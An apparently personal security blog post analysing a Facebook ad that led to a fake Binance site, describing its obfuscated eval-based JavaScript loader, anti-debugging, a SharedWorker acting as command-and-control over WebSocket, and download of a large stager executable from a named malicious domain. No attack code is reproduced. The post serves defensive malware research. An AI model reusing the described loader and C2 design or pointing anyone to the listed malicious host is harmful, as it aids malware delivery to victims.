search

burstFacebook malware in plain sight!

Ads are simply a premium Gophish for hackers.

circle-info

The content on this blog is published for educational and informational purposes only. I am sharing my analysis and research to help others learn about cybersecurity threats and defensive techniques.

This story is going to be fun and I hope you enjoy it.

hashtag
1. Initial access phase

It started when i was looking at my FB feed. I noticed a FB ads that was related to Binance.

I was boring so i clicked on the FB ads. Eventually, my curiosity brought me to the following website.

At first, it looks normal right. However, if you look closer to the domain name. You should notice that it is not https://binance.com!

If I try to access the URL from other browsers, I will get a 404 Page not found page.

This is pretty interesting. So I decided to dig deeper. I looked at the HTML source page, nothing seems to raise a red flag here.

hashtag
1.1 Defense evasion - Deobfuscate/Decode Files or Information techniques (T1140)arrow-up-right

I usually like to read JS files as those used to get me high findings during pentest engagements. So I couldn't help myself but to click on it.

Well, well, well. What do we have here? Isn't it supposed to be a JS file? It is quite common for minified JS but not obfuscated JS. At that moment, my brain is fully awake and ready to track down this.

So i went to https://obf-io.deobfuscate.io/arrow-up-right to de-obfuscate this JS file.

Notice that this JS function uses .eval()!!! This is how APT38 and other crime organizations usually operate. They like to use .eval() to execute arbitrary code execution in whatever that is inside the JS file inside the browser.

Moreover, they use encryption to encrypt the real payload using AES-CBC key + hash IV. we could use those to decrypt to see what's inside it.

I created a Python script to decrypt the content inside it using https://pypi.org/project/pycryptodome/arrow-up-right or you can use https://pypi.org/project/cryptography/arrow-up-right.

Let us see what's inside it.

It looks so d@mn hard. I need JS beautifier

Again it is obfuscated. We need to de-obfuscate it first (d@mn these hackers aren't playing around. Kudos for that).

Much better!

hashtag
Payload analysis

  1. Execute anti-debugging function after the file is .eval().

  1. Use StreamSaver to convert installer.exe into stream for shared workers to download it.

They are using StreamSaver (https://github.com/jimmywarting/StreamSaver.jsarrow-up-right) to convert the installer executable file into chunks. You can take a moment to read what is StreamSaver is used for. IMO, I think they can just spin up an EC2 instance and host installer.exe there but maybe StreamSaver is stealthier and more reliable? IDK.

  1. Check that the victim is running on Windows OS via User Agent.

  1. Run a shared worker to command and download the installer.exe from StreamSaver using WS protocol to make a connection back to the attacker host.

SharedWorkers configuration in ID variable
Instruction for SharedWorkers. More like a configuration
Make a connection back to the attacker host via WebSocket.
This is where a real malware is installed

Basically, the installer.exe (the one in the phishing website) is a decoy. It does not do anything except for receiving commands from the SharedWorker that is running in background on the phishing website. This SharedWorker is the real C2 server. It orchestrates everything from checking victims' OS, downloading and installing the real malware file. It is quite stealthy because if you look at it, nothing suspicious just 2 hosts trying to communicate to each other. So if you happen to install this malware, do not open this website. Problem solved. lol

hashtag
Artifact Summary

1

JavaScript payload .eval()

Anti debugging, create a SharedWorker in background serves as a middle man between victim's machine and hacker's host, check victims' OS via User Agent, download installer.exe (real malware) via StreamSaver, use WebSocket protocol for communicating C2 operations, and eventually installing the malware on victim's machine.

2

Download an executable file (Stager program)

From https://user-desktops-windows.com/arrow-up-right

3

Run it!

Successfully implanted a stager malware with high privileges that listening on 127.0.0.1:30000

4

C2 connection established

Stager program is now reachable by a malicious SharedWorker to send command!

P.S If you want to know whether this SharedWorker is trying to send commands to the stager program in your Windows machine, you can inspect port 30000 when you are opening the phishing website. Because they are running SharedWorkers behind iframe.

Lucky for me I didn't install the stager program haha. Whatever that is inside the installer.exe is pretty dangerous. Think of it as a Cobalt Strike beacon and team server is the phishing website. I won't dig deeper in how that executable file works since it requires a malware sandbox and the setup is a pain in the a$$. The executable file is pretty large (700 mb), we couldn't use anyrun or other online sandboxes to fingerprint it.

How is it possible for a malware to run at system level?

Because when you install it. It requires administrative privileges for the installation. Meaning you already gave the privilege to them after you click on 'Yes' button in UAC window.

Bro is not even bother adding some icon xD

Previous(CVE-2025-71031) Denial of Service in Melon C library

Last updated